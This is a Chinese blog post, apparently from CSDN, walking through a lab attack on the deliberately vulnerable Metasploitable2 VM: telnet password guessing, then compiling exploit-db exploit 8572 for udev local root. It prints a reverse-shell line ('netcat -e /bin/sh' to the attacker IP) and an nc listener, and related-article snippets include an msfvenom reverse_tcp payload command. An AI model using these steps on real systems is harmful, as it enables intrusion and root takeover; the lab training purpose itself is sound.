msfconsle telnet 登陆Metasploittable2提权

最新推荐文章于 2023-07-28 15:50:56 发布
最新推荐文章于 2023-07-28 15:50:56 发布
阅读量746 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/100140302
版权

 

实验环境:

攻击机:kali linux 
ip:192.168.172.134
目标机:Metasploittable2
ip:192.168.172.129

攻击过程:

step1:爆破Metasploittable2的telnet登陆密码,用户名:msfadmin,密码:msfadmin     //用户非root权限

step2:msf 登陆Metasploittable2后,下载exp,

地址:wget http://www.exploit-db.com/download/8572              //下载不下来,需要在kali linux中下载,然后开启apache3服务,再wget 下载。

step3:kali 中设置nc监听

使用 netcat 进行监听 后期返回的shell。

命令:nc -lvp 4444

step4:msf 登陆Metasploittable2中,编译执行exp,获取root

命令:gcc 源文件  -o  exploit echo '#!/bin/sh' > /tmp/run                  //此时源文件为8572.c

命令:echo '/bin/netcat -e /bin/sh ip地址 4444' >> /tmp/run           //此时ip地址为192.168.172.134

命令:ps -edf | grep udev                         //搜索udev程序的pid

step5:执行exploit   具有root权限的pid -1 ./exploit 数字pid -1 

命令:./exploit  2178               //原来pid为2179

总结:telnet登陆Metasploittable2,后为非root用户,需要做的就是提权,这里用到的是exp,然后nc进行连接。

02be55f
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试学习系列之《Metasploitable介绍》(一)
DAkoll的博客
11-03 3013
Metasploitable是什么 ? Metasploitable 是一个刻意制作出来包含漏洞的Linux虚拟机系统。它可以用来做安全训练,测试安全工具和练习渗透测试技术。系统的默认账户 账号:msfadmin 密码:msfadmin 为官方建议你不要把这个易被攻击的虚拟机暴露在公共网络上(请使用NAT或者Host-only模式)有系统方面的问题可以联系系统的搭建者:msfdev@met
利用安全漏洞检测工具Metasploit对靶机Metasploitable2的Telnet登录提权
weixin_45256499的博客
01-04 1694
1.实验环境 工具:kali下的metasploit 攻击者:192.168.43.35( kali ) 靶机:192.168.43.133(Metasploitable2) Telnet协议是TCP/IP协议族中的一员,是internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就像直接在服务器的控制台上输入一样。 虽然telnet
Metasploit权限提升全剧终
Fly_鹏程万里
07-06 5435
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User权限。低的权限级别将会使我们受到很多的限制,所以必须将访问权限从Guset提升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或LINUX操作系统中root账户权限。提升权限的方式分为两类。纵向提权:低权限角色获得高...
Metasploit拿到shell后 低权限---提权
qq_58000413的博客
08-24 1524
下载地址https://github.com/AonCyberLabs/Windows-Exploit-Suggester1、安装xlrd包(注意python2、3版本的pip问题)使用python2 的pip来安装xlrd包命令:python2-m pip install xlrd==1.2.0注意:安装的xlrd版本必须为1.2.0版本,否则使用时会报错,原因是:最近xlrd更新到了2.0.1版本,只支持.xls文件。e.高级 -> 添加 -> 选择主体 -> 输入用户名,检查名称 -> 确定。
6-9漏洞利用-Telnet登陆提权
山兔的博客
07-16 545
使用弱口令登录之后,进行提权
Python telnet登陆功能实现代码
09-17
实现Python telnet登陆功能主要涉及`telnetlib`模块,这是一个内置库,提供了基本的telnet客户端功能。 下面我们将详细探讨如何使用Python实现telnet登录以及相关代码的解释: 首先,导入必要的库: ```python ...
思科路由器Telnet登陆配置方法
10-01
2. 进入特权模式:在Router>提示符下输入enable命令,然后输入特权模式密码,进入特权执行模式,提示符会变为Router#。 3. 进入全局配置模式:在Router#提示符下输入config或者configure terminal命令,进入全局...
Telnet远程登陆实验报告
11-10
Telnet是一种基于TCP/IP协议的远程登录协议,它允许用户通过网络远程访问另一台计算机系统。尽管它在安全性方面存在诸多缺陷(例如,所有的通信都是明文传输,容易遭受中间人攻击),但在学习网络技术的过程中,...
Python实现的使用telnet登陆聊天室实例
12-24
本文实例讲述了Python实现的使用telnet登陆聊天室。分享给大家供大家参考。具体如下: 前久在家学习Python的时候写的一个简单的聊天室,可以使用telnet登陆。 遗憾的是现在对中文的支持很差,英文聊天倒是没什么...
利用msf 对靶机metasploittable2 进行信息收集
枫梓林のBlog
04-20 1360
利用msf 对靶机metasploittable2 进行信息收集 文章目录利用msf 对靶机metasploittable2 进行信息收集测试环境信息统一收集1.使用netdiscover 扫描存活主机2.使用 Nmap 确认该目标主机3.使用zenmap 扫描开放端口 查找漏洞4.如上图这么多端口开放使用 Nessus 扫描该主机的漏洞一、基于 TCP 协议收集主机信息1.1 ARP 扫描1.2 使用半连接方式扫描TCP端口1.3 使用 auxiliary/sniffer 下的psnuffle 模块进行密
看完这篇 教你玩转渗透测试靶机——Metasploitable2
热门推荐
Aluxian_的博客
03-09 2万+
Metasploitable2渗透测试详解Metasploitable2靶机介绍:Metasploitable2靶机下载:Metasploitable2靶机安装:Metasploitable2靶机漏洞详解: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 Metasploita
windows10 telnet登陆Metasploittable2
边城浪子的博客
08-26 240
实验环境: 控制机:windows10 ip:192.168.0.102 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:安装telnet windows10默认是不安装telnet “运行”----“control”----"添加删除程序"----"启动或关闭window功能"---"telnet开启"----确定 step2:...
Metasplotable3 简易安装教程
firejq 的博客
11-06 9904
点击此处阅读原文IntroductionMetasplotable3 相比 Metasplotable2 更为强大,其安装方法也繁琐复杂了许多,以下就自己的安装经历做简要总结。Install in VirtualBox 安装VirtualBox及其扩展包: 安装Vagrant安装后重启,会自动将vagrant添加至系统环境变量。 下载 metasploitable3 相关文件git clone ht
kali linux 对 Metasploittable2漏洞利用rlogin 最高权限登陆(试验未成功)
边城浪子的博客
09-16 1275
远程登录(rlogin)是一个 UNIX 命令,它允许授权用户进入网络中的其它 UNIX 机器并且就像用户在现场操作一样。一旦进入主机,用户可以操作主机允许的任何事情 实验环境: 攻击机:kali linux ip:192.168.172.134 目标机:Metasploittable2 ip:192.168.172.129 攻击过程: step1:nmap 进行探测 nmap 192...
Metasploit 渗透测试框架的基本使用(msf
枫梓林のBlog
04-20 1004
Metasploit 渗透测试框架的基本使用 文章目录Metasploit 渗透测试框架的基本使用一、Metasploit 渗透测试框架介绍1.1 Metasploit 体系框架二、Metasploittable2-Linux 靶机系统介绍2.1 靶机信息2.2 修改root用户密码三、Metasploit 基本使用方法3.1 Metasploit 基本命令3.1.1 手动启动数据库3.1.2 查看帮助信息3.2 常用命令介绍3.2.1 核心命令中 connect 命令3.2.2 模块相关的命令 show
Metasploitable2靶机学习
m0_46371267的博客
10-13 4111
Metasploitable2靶机渗透 什么是Metasploitable2? Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。 使用步骤 下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download 默认用户名密码都为:msfadmin 下载下来后直接双击 网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网
利用kali爆破telnet
weixin_44281516的博客
04-16 3181
第一步启动msfconsole search telnet use auxiliary/scanner/telnet/telnet_login,然后show options set rhosts IP(目标IP) set USERPASS_FILE /usr/share/wordlists/metasploit/piata_ssh_userpass.txt (设置爆破所使...
Windows提权学习笔记
m0_62466350的博客
07-28 573
service_permissions模块会使用,两种方式获取system权限,如果以管理员权限运行,会尝试创建并运行一个新的服务,如果当前权限不允许创建服务,会判断哪些服务的文件或文件夹的权限有问题,并对其进行劫持,在劫持服务时会创建一个可执行程序,其文件名和安装路径都是随机的。如果网站里面使用的数据库是sqlserver 那么如果找到sa的密码,利用提权脚本,执行命令,但是不一定是系统权限,还要看管理员开始安装sqlserver的权限设置,一般情况是system权限或者pulic,均能执行命令。
kali下msf提权
失心少年
09-23 4758
生成木马 Msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.184.132 lport=4444 -f exe -o /root/Desktop/1.exe 配置监听程序 Msfconsole 打开Metaploit msf > use exploit/multi/handler s...
思科关闭telnet登陆
最新发布
07-10
然而,出于安全性考虑,许多管理员会选择禁用或限制 Telnet 登陆,尤其是在生产环境中的路由器和交换机。 Cisco关闭Telnet登陆通常是通过以下几个步骤操作: 1. 登录到设备的管理界面,例如通过Web浏览器访问IOS ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值